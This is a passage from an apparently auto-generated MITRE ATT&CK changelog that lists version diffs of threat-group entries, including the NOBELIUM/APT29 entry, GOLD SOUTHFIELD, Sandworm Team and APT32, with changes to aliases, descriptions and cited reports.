external_references[23]['url']https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
external_references[24]['source_name']MSTIC NOBELIUM May 2021SentinelOne NobleBaron June 2021
external_references[24]['description']Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.
external_references[24]['url']https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/
external_references[25]['source_name']MSRC Nobelium June 2021Microsoft Unidentified Dec 2018
external_references[25]['description']MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.
external_references[25]['url']https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
external_references[26]['source_name']MSTIC Nobelium Toolset May 2021MSTIC NOBELIUM May 2021
external_references[26]['description']MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.
external_references[26]['url']https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
external_references[27]['source_name']MSTIC NOBELIUM Mar 2021MSRC Nobelium June 2021
external_references[27]['description']Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.
external_references[27]['url']https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/
external_references[28]['source_name']NCSC APT29 July 2020MSTIC Nobelium Toolset May 2021
external_references[28]['description']National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
external_references[28]['url']https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdfhttps://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
external_references[29]['source_name']Cybersecurity Advisory SVR TTP May 2021MSTIC NOBELIUM Mar 2021
external_references[29]['description']NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
external_references[29]['url']https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdfhttps://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
external_references[30]['source_name']NSA Joint Advisory SVR SolarWinds April 2021NCSC APT29 July 2020
external_references[30]['description']NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
external_references[30]['url']https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDFhttps://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf
external_references[31]['source_name']Secureworks IRON HEMLOCK ProfileCybersecurity Advisory SVR TTP May 2021
external_references[31]['description']Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.
external_references[31]['url']http://www.secureworks.com/research/threat-profiles/iron-hemlockhttps://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf
external_references[32]['source_name']Secureworks IRON RITUAL ProfileNSA Joint Advisory SVR SolarWinds April 2021
external_references[32]['description']Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.
external_references[32]['url']https://www.secureworks.com/research/threat-profiles/iron-ritualhttps://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF
external_references[33]['source_name']UK Gov Malign RIS Activity April 2021PWC WellMess C2 August 2020
external_references[33]['description']UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.
external_references[33]['url']https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-serviceshttps://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html
external_references[34]['source_name']UK Gov UK Exposes Russia SolarWinds April 2021PWC WellMess July 2020
external_references[34]['description']UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.
external_references[34]['url']https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromisehttps://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html
external_references[35]['source_name']UK NSCS Russia SolarWinds April 2021Secureworks IRON HEMLOCK Profile
external_references[35]['description']UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.
external_references[35]['url']https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromisehttp://www.secureworks.com/research/threat-profiles/iron-hemlock
external_references[36]['source_name']White House Imposing Costs RU Gov April 2021Secureworks IRON RITUAL Profile
external_references[36]['description']White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.
external_references[36]['url']https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/https://www.secureworks.com/research/threat-profiles/iron-ritual
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.14.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesSolarStorm
aliasesBlue Kitsune
external_references{'source_name': 'UK Gov Malign RIS Activity April 2021', 'description': 'UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'}
external_references{'source_name': 'UK Gov UK Exposes Russia SolarWinds April 2021', 'description': 'UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'}
external_references{'source_name': 'UK NSCS Russia SolarWinds April 2021', 'description': 'UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', 'url': 'https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'}
external_references{'source_name': 'Unit 42 SolarStorm December 2020', 'description': 'Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.', 'url': 'https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/'}
external_references{'source_name': 'White House Imposing Costs RU Gov April 2021', 'description': 'White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.', 'url': 'https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'}
x_mitre_contributorsJoe Gumke, U.S. Bank

[G0115] GOLD SOUTHFIELD

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is t1[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is 
>a financially motivated threat group active since at least 2>a financially motivated threat group active since at least 2
>019 that operates the [REvil](https://attack.mitre.org/softw>018 that operates the [REvil](https://attack.mitre.org/softw
>are/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD]>are/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD]
>(https://attack.mitre.org/groups/G0115) provides backend inf>(https://attack.mitre.org/groups/G0115) provides backend inf
>rastructure for affiliates recruited on underground forums t>rastructure for affiliates recruited on underground forums t
>o perpetrate high value deployments.(Citation: Secureworks R>o perpetrate high value deployments. By early 2020, [GOLD SO
>Evil September 2019)(Citation: Secureworks GandCrab and REvi>UTHFIELD](https://attack.mitre.org/groups/G0115) started cap
>l September 2019)(Citation: Secureworks GOLD SOUTHFIELD)>italizing on the new trend of stealing data and further exto
 >rting the victim to pay for their data to not get publicly l
 >eaked.(Citation: Secureworks REvil September 2019)(Citation:
 > Secureworks GandCrab and REvil September 2019)(Citation: Se
 >cureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution o
 >f Pinchy Spider July 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.secureworks.com/research/revil-sodinokibi-ransomware
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 12:52:34.528000+00:002023-03-28 20:49:53.223000+00:00
description[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
external_references[1]['source_name']Secureworks REvil September 2019Pinchy Spider
external_references[1]['description']Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
external_references[2]['source_name']Secureworks GandCrab and REvil September 2019Secureworks REvil September 2019
external_references[2]['description']Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
external_references[2]['url']https://www.secureworks.com/blog/revil-the-gandcrab-connectionhttps://www.secureworks.com/research/revil-sodinokibi-ransomware
external_references[3]['source_name']Secureworks GOLD SOUTHFIELDCrowdStrike Evolution of Pinchy Spider July 2021
external_references[3]['description']Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.
external_references[3]['url']https://www.secureworks.com/research/threat-profiles/gold-southfieldhttps://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesPinchy Spider
external_references{'source_name': 'Secureworks GandCrab and REvil September 2019', 'description': 'Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.', 'url': 'https://www.secureworks.com/blog/revil-the-gandcrab-connection'}
external_references{'source_name': 'Secureworks GOLD SOUTHFIELD', 'description': 'Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/gold-southfield'}

[G0034] Sandworm Team

Current version: 3.0

Version changed from: 2.2 → 3.0

Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.justice.gov/opa/page/file/1098481/download
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 20:11:40.313000+00:002023-03-08 22:12:31.238000+00:00
external_references[5]['source_name']BlackEnergy (Group)IRIDIUM
external_references[5]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Microsoft Prestige ransomware October 2022)
external_references[6]['source_name']TelebotsBlackEnergy (Group)
external_references[6]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name']IRON VIKINGTelebots
external_references[7]['description'](Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name']US District Court Indictment GRU Oct 2018IRON VIKING
external_references[8]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[9]['source_name']Dragos ELECTRUMUS District Court Indictment GRU Oct 2018
external_references[9]['description']Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[9]['url']https://www.dragos.com/resource/electrum/https://www.justice.gov/opa/page/file/1098481/download
external_references[10]['source_name']F-Secure BlackEnergy 2014Dragos ELECTRUM
external_references[10]['description']F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[10]['url']https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdfhttps://www.dragos.com/resource/electrum/
external_references[11]['source_name']iSIGHT Sandworm 2014F-Secure BlackEnergy 2014
external_references[11]['description']Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[11]['url']https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.htmlhttps://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[12]['source_name']CrowdStrike VOODOO BEARiSIGHT Sandworm 2014
external_references[12]['description']Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
external_references[12]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[13]['source_name']InfoSecurity Sandworm Oct 2014CrowdStrike VOODOO BEAR
external_references[13]['description']Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[13]['url']https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[14]['source_name']NCSC Sandworm Feb 2020Microsoft Prestige ransomware October 2022
external_references[14]['description']NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.
external_references[14]['url']https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisoryhttps://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/
external_references[15]['source_name']USDOJ Sandworm Feb 2020InfoSecurity Sandworm Oct 2014
external_references[15]['description']Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[15]['url']https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.htmlhttps://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[16]['source_name']US District Court Indictment GRU Unit 74455 October 2020NCSC Sandworm Feb 2020
external_references[16]['description']Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[16]['url']https://www.justice.gov/opa/press-release/file/1328521/downloadhttps://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[17]['source_name']Secureworks IRON VIKING USDOJ Sandworm Feb 2020
external_references[17]['description']Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[17]['url']https://www.secureworks.com/research/threat-profiles/iron-vikinghttps://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[18]['source_name']UK NCSC Olympic Attacks October 2020US District Court Indictment GRU Unit 74455 October 2020
external_references[18]['description']UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[18]['url']https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-gameshttps://www.justice.gov/opa/press-release/file/1328521/download
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.23.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesIRIDIUM
external_references{'source_name': 'Secureworks IRON VIKING ', 'description': 'Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-viking'}
external_references{'source_name': 'UK NCSC Olympic Attacks October 2020', 'description': 'UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.', 'url': 'https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games'}
Minor Version Changes

[G0073] APT19

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-05-26 12:38:01.003000+00:002023-03-21 20:44:02.443000+00:00
external_references[1]['source_name']APT19Sunshop Group
external_references[1]['description'](Citation: FireEye APT19)(Citation: Dark Reading Codoso Feb 2015)
external_references[2]['source_name']CodosoCodoso Team
external_references[2]['description'](Citation: Unit 42 C0d0so0 Jan 2016)(Citation: FireEye APT Groups)
external_references[3]['source_name']C0d0so0APT19
external_references[3]['description'](Citation: Unit 42 C0d0so0 Jan 2016)(Citation: FireEye APT19)
external_references[4]['source_name']Codoso TeamCodoso
external_references[4]['description'](Citation: FireEye APT Groups)(Citation: Unit 42 C0d0so0 Jan 2016)
external_references[5]['source_name']Sunshop GroupC0d0so0
external_references[5]['description'](Citation: Dark Reading Codoso Feb 2015)(Citation: Unit 42 C0d0so0 Jan 2016)
external_references[7]['source_name']ICIT China's Espionage Jul 2016Dark Reading Codoso Feb 2015
external_references[7]['description']Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.
external_references[7]['url']https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059
external_references[10]['source_name']Dark Reading Codoso Feb 2015ICIT China's Espionage Jul 2016
external_references[10]['description']Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.
external_references[10]['url']https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/
x_mitre_version1.41.5

[G0050] APT32

Current version: 2.6

Version changed from: 2.5 → 2.6

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 16:39:50.790000+00:002023-03-21 21:04:18.158000+00:00
external_references[1]['source_name']APT32SeaLotus
external_references[1]['description'](Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Cybereason Oceanlotus May 2017)
external_references[2]['source_name']SeaLotusAPT-C-00
external_references[2]['description'](Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
external_references[3]['source_name']OceanLotusAPT32
external_references[4]['source_name']APT-C-00OceanLotus
external_references[4]['description'](Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
external_references[5]['source_name']FireEye APT32 May 2017Amnesty Intl. Ocean Lotus February 2021
external_references[5]['description']Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlhttps://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf
external_references[6]['source_name']Volexity OceanLotus Nov 2017FireEye APT32 May 2017
external_references[6]['description']Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.
external_references[6]['url']https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
external_references[7]['source_name']ESET OceanLotusCybereason Oceanlotus May 2017
external_references[7]['description']Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.
external_references[7]['url']https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/https://www.cybereason.com/blog/operation-cobalt-kitty-apt
external_references[8]['source_name']Cybereason Oceanlotus May 2017ESET OceanLotus Mar 2019
external_references[8]['description']Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.
external_references[8]['url']https://www.cybereason.com/blog/operation-cobalt-kitty-apthttps://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
external_references[9]['source_name']ESET OceanLotus Mar 2019ESET OceanLotus
external_references[9]['description']Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.
external_references[9]['url']https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
external_references[10]['source_name']Amnesty Intl. Ocean Lotus February 2021Volexity OceanLotus Nov 2017
external_references[10]['description']Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
external_references[10]['url']https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdfhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
x_mitre_version2.52.6

[G0096] APT41

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 20:09:29.475000+00:002023-03-23 15:45:58.846000+00:00
external_references[4]['url']https://content.fireeye.com/apt-41/rpt-apt41https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
external_references[5]['url']https://content.fireeye.com/apt-41/rpt-apt41https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
external_references[6]['url']https://blog.group-ib.com/colunmtk_apt41https://www.group-ib.com/blog/colunmtk-apt41/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.03.1

[G0143] Aquatic Panda

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
aliases['Aquatic Panda']
values_changed
STIX FieldOld valueNew Value
modified2022-06-29 20:28:29.913000+00:002023-03-21 21:16:34.243000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[G0114] Chimera

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-25 19:35:55.074000+00:002023-03-22 03:25:24.295000+00:00
external_references[2]['url']https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdfhttps://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf
x_mitre_version2.12.2

[G0080] Cobalt Group

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 22:02:12.586000+00:002023-03-22 03:28:29.415000+00:00
external_references[1]['source_name']Cobalt GroupCobalt Spider
